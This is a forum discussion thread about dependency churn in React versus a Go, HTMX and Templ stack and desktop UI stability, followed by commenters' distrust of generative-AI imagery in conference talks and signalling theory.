It’s easy to lose that historical context when the claim that “it’s different this time!” resounds so often.
Fair point, and since I have zero experience in native UI development I can’t say much. But lately I’ve seen React influence mobile development such as SwiftUI and Jetpack Compose, which must’ve meant some churn for mobile devs and that there was room for innovation.
I will agree Android development churns about as much as Web frontend development. I was thinking more about desktop UIs, which have been a lot more stable. You can run Win32 apps from the late 90s on modern Windows, and I believe you could mostly rebuild them without changes. You can rebuild NextStep apps for modern MacOS with very few changes.
I’ve heard that Windows is legendary in terms of backwards compatibility, probably due to enterprise customers they have.
“with very few changes” depends on how many changes do you consider to be very few. The author complains about Tanstack Query but v5 comes with a codemod that does the job for you.
While I haven’t done any desktop app development, I’ve heard that retained mode graphics (which I gather is the default for desktop toolkits) is harder to develop and I enjoy that the industry started to adopt immediate mode graphics.
There’s your answer. The second someone needs a production web app for a business they’re going to be looking more fondly at React.
For small-to-medium sized projects with 1-2 developers, it doesn’t really matter what tech stack is chosen.
The maintenance burden is what matters, the last thing I want to be doing after I finally get back to a personal project is fight with the hips system, update dependencies with braking changes, find out there is no replacement for one lib I’m using and it’s abandoned / not longer compiles if I update common dependencies wit other libs, etc.
I want to come back months later and be able to work on a personal project, not spend my fleeting time maintaining it. Tech stack here matters
It’s insane to me that people accept the BS work of keeping up with the version treadmill. Don’t you want to be doing things other than fiddling with code that was working fine yesterday?
In my opinion, I think many developers feel that any code containing bugs (or that hasn’t seen an update in some period of time) is a potential exploit and the only thing to do is constantly update the code. Yes, I want to do other things than fiddling with code that was working fine yesterday, but I think that’s a (sadly) minority position these days.
Edit: remove sarcastic remark.
This is exactly what I was trying to convey with my article!
At least from my experience Go+HTMX+Templ allows me to do this.
Less dependency management pain = more fun time programming my personal project
Any chance you could write a more detailed article about your stack, how you use, and how it all fits together?
Yes, I am considering this, since multiple people gave me the same feedback.
I didn’t go into too much detail about the Go+HTMX+Templ stack because I wanted to keep the blog post short and focus exclusively on the topic of dependency management.
I’m maintaining a React app at work in production and am looking fondly at htmx, lol. The whole React stack has a bonkers level of complexity. The constant flow of upgrades and security vulns. The evolving ‘best practices’ every couple of years. The Node and npm breakages. Having to move away from the deprecated CRA to Vite and Vitest. The list goes on.
Maybe?
At my previous job we switched away from React to HTMX for our less rich Web UIs (think portals in HTMX vs. real-time positioning displays in React).
Not directly related to this talk, but..
Is it just me when I see genAI content in a talk, I get wary that how much effort has been put in it? Is the whole talk generated? How much of it is generated by a robot? Can it be trusted?
I am biased against using genAI due to having many artist friends. I don’t think the talker here has done anything wrong really, just using the tools they have I suppose.
But it’s this nagging feeling that something is off. Kinda like the generated content always looks off. And it’s hard to trust it due to that.
It’s not just you. I think the way we’ve typically assessed the quality of human to human communication at a first approximation leans heavily on the relative expense of signaling: is the talk grammatically correct, laid out well visually, flows well, etc. All of these things point to “the speaker spent some time outlining their thoughts in a cohesive manner, so the content could be worthwhile.”
Then there’s genAI images, where you type what you want, and it spits out something in 1 minute, ready to use. Totally messes with our heuristic outlined above. Except it has nothing to do with the content itself! As a counter-point: we probably wouldn’t have an issue with a meme, despite it being easy to locate and put in.
We’ve all read posts where the images and content were clearly AI-written. I think we’re just adapting to the idea that parts of something could use AI in the process without compromising the content.
It’s funny how these signalling issues mirror some of the older issues from my childhood. I have cerebral palsy and there was a resistence in the 80’s and 90’s to allowing me to submit my homework assignments typed instead of handwritten.
Removing these external signals would give me an unfair advantage over other students. Thankfully, I only had one teacher who refused to budge on the issue due to his philosophical idealism.
I’m not saying any of this as a supporter of AI (e.g. I don’t use any LLM in my own coding work). I’m mostly just finding it funny the was that history rhymes.
At least in your example, the input is from your brain, the output just looks different.
In genAI case, the input is not really what you say, but some soup of copy pasted stuff from scraped material, and then that pretends to be human output.
in particular, if we ignore the spellchecker point:
printed text is lower entropy than handwritten text, but the information that is there is all intentional; whereas
an ai generated image comprises not much more information than the prompt that generated it, but the presentation is burdened with noise; a human-made image contains high entropy but little noise
*nod* I’m reminded of a great article named Targeted Advertising Considerd Harmful that goes into the biological signalling theory (i.e. peacock tails) angle.
The introduction of targeted adverising made online ads in general worthless as a signal to the potential customer that the vendor wasn’t a fly-by-night scam.